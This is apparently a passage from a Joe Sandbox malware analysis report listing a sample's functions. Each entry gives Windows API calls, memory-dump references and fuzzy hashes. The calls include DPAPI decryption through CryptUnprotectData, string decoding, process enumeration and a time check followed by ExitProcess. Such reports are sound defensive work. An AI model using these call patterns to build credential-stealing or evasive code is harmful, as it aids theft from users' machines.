                                    Function 00BDC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BDC971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BDC97C
                                    • lstrcat.KERNEL32(?,00BF0B47), ref: 00BDCA43
                                    • lstrcat.KERNEL32(?,00BF0B4B), ref: 00BDCA57
                                    • lstrcat.KERNEL32(?,00BF0B4E), ref: 00BDCA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: c452644a213b00d9954c6f0ff7d5ce1104e47d185da48b54186ffe5da3ea9ee7
                                    • Instruction ID: 82148cc3d6cbd58dd97608674fbc6971027e5d2e56f9a86e2868c9a35ee15c0e
                                    • Opcode Fuzzy Hash: c452644a213b00d9954c6f0ff7d5ce1104e47d185da48b54186ffe5da3ea9ee7
                                    • Instruction Fuzzy Hash: C74150B590421EDFDB10DFA0DD89BFEFBB8AB48304F1041A9E509A7290D7706A84CF91
                                    Function 00BE6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00BE6C0C
                                    • sscanf.NTDLL ref: 00BE6C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BE6C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BE6C60
                                    • ExitProcess.KERNEL32 ref: 00BE6C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: dcc8db746d3aa194636aa9ae4f0abc776f887cf419962fc86ad5ad847fd525ea
                                    • Instruction ID: d23e67a33fb52e19316481ecf89d24589d7483242ef4f1241f11942e8bfb69a2
                                    • Opcode Fuzzy Hash: dcc8db746d3aa194636aa9ae4f0abc776f887cf419962fc86ad5ad847fd525ea
                                    • Instruction Fuzzy Hash: 1B21BBB5D14208AFCB04DFE5E845AEEB7B9FF4C300F04856AE516B3250EB34A608CB65
                                    Function 00BD72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BD72AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD72B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BD72E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BD7304
                                    • LocalFree.KERNEL32(?), ref: 00BD730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: ff5d7ef310c1a362ec484cbb2df5e0152fb1fedf06782201118cf5214868010e
                                    • Instruction ID: 28eb8ef843acfc094d2434e02d21d6d1249e9bd039130dc9b3dc0653fee2c75f
                                    • Opcode Fuzzy Hash: ff5d7ef310c1a362ec484cbb2df5e0152fb1fedf06782201118cf5214868010e
                                    • Instruction Fuzzy Hash: F1012DB5A44208BFDB10DBA4CC45F9D77B8AB48B00F104045FB45BA2D0DAB0BA058B64
                                    Function 00BE9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BE97AE
                                    • Process32First.KERNEL32(00BF0ACE,00000128), ref: 00BE97C2
                                    • Process32Next.KERNEL32(00BF0ACE,00000128), ref: 00BE97D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00BE97EC
                                    • CloseHandle.KERNEL32(00BF0ACE), ref: 00BE980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 810d474e1a545852f6c8d4379ec7b954aa13178e4dbf89d18e07dc8b4776b7a8
                                    • Instruction ID: 05db68d647fa6659bcc4c96149b8e2be46adf4ce32f4276360b708dfe16a9770
                                    • Opcode Fuzzy Hash: 810d474e1a545852f6c8d4379ec7b954aa13178e4dbf89d18e07dc8b4776b7a8
                                    • Instruction Fuzzy Hash: 50010075A14208AFDB20DFA6CD44BDDB7F8FB4D700F1045C8E545A6250D734AA48DF60
                                    Function 00BF4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    • Opcode ID: e4593669e53e20df4336ba31952ce2d970cc32ece5398df97f5936804979b219
                                    • Instruction ID: d3c33915c06b5ebb29559d83aea98fd01575ef85b14b6fe61ec40438d458658a
                                    • Opcode Fuzzy Hash: e4593669e53e20df4336ba31952ce2d970cc32ece5398df97f5936804979b219
                                    • Instruction Fuzzy Hash: 6B63477241EBD81EC727CB3047B65617FA6FA132103194ACECBC18F5B3C6949A1AE356
                                    Function 0103DBB6 Relevance: 6.6, Strings: 4, Instructions: 1624COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Avg$__W$tV?=$ow?
                                    • API String ID: 0-3191419669
                                    • Opcode ID: 9bce75534edb2da4e45972c69b2d4bf1dfde47a5d7b0c0f0a443dc772080e421
                                    • Instruction ID: f65c7bec86295e5f87ac9d3b4c6aea4299f220d6ebf44b3514498c0bb3491fcc
                                    • Opcode Fuzzy Hash: 9bce75534edb2da4e45972c69b2d4bf1dfde47a5d7b0c0f0a443dc772080e421
                                    • Instruction Fuzzy Hash: ADB2F3F360C2049FE304AE29EC8567AFBE9EF94360F16493DEAC5C3744E63598418796
                                    Function 00BE9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00BD51D4,40000001,00000000,00000000,?,00BD51D4), ref: 00BE9050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: f2623366260d810685f14314f9ea6cdb38b73a486db4cf55cb093121548afafc
                                    • Instruction ID: 40ce91183601b627175ac25e7f222107909c82009c273f8ec7d09d553d3418f5
                                    • Opcode Fuzzy Hash: f2623366260d810685f14314f9ea6cdb38b73a486db4cf55cb093121548afafc
                                    • Instruction Fuzzy Hash: A211F570204248FFDB00CF66DC84BAA33E9EF8A350F508488FA198B251D772E9458BA0
                                    Function 00BDA210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00BD4F3E,00000000,?), ref: 00BDA251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA27A
                                    • LocalFree.KERNEL32(?,?,?,?,00BD4F3E,00000000,?), ref: 00BDA28F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 082f03ce12943ac8a27908729e917edd2c5436c61ebb9641549c4252490d51d0
                                    • Instruction ID: 48310c992ae9276963176309a03e5cc098c4b24c2489945679d0bb9c08d2805e
                                    • Opcode Fuzzy Hash: 082f03ce12943ac8a27908729e917edd2c5436c61ebb9641549c4252490d51d0
                                    • Instruction Fuzzy Hash: 0811A4B4240308EFEB11CF65CC95FAA77B5EB89B10F208499FD159B390C7B2A941CB50
                                    Function 00BE7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,018BDDD0,00000000,?,00BF0DF8,00000000,?,00000000,00000000), ref: 00BE7BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,018BDDD0,00000000,?,00BF0DF8,00000000,?,00000000,00000000,?), ref: 00BE7C0D
                                    • wsprintfA.USER32 ref: 00BE7C47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: ac16d846dc77b839177fd4adf574d5388aa9bc585d8c74a58ceb3fa2f474787a
                                    • Instruction ID: 147d33aad3f1c00dac137023fbe4345cec12f143fb813b09163b1f275595eea7
                                    • Opcode Fuzzy Hash: ac16d846dc77b839177fd4adf574d5388aa9bc585d8c74a58ceb3fa2f474787a
                                    • Instruction Fuzzy Hash: 3C11CEB1A49218EFEB20CB55DC49FA9BBB8FB45710F1003D5F609A32E0DB742A448B50
                                    Function 01033965 Relevance: 5.3, Strings: 3, Instructions: 1575COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ATg$r6?s$^^z
                                    • API String ID: 0-2191292061
                                    • Opcode ID: 074d1cc189fa8bd87100809ddf2573494432ebd9daa9960c151ae48ab638199f
                                    • Instruction ID: a999ea69655503d96851f3fd37a51a05613d5aa1524352a90475558543d7f11a
                                    • Opcode Fuzzy Hash: 074d1cc189fa8bd87100809ddf2573494432ebd9daa9960c151ae48ab638199f
                                    • Instruction Fuzzy Hash: 6EB216F3A082009FE304AE2DDC8567ABBE5EF94720F1A893DEAC5C7744E63558458793
                                    Function 00BE3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(00BEE120,00000000,00000001,00BEE110,00000000), ref: 00BE39A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BE3A00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
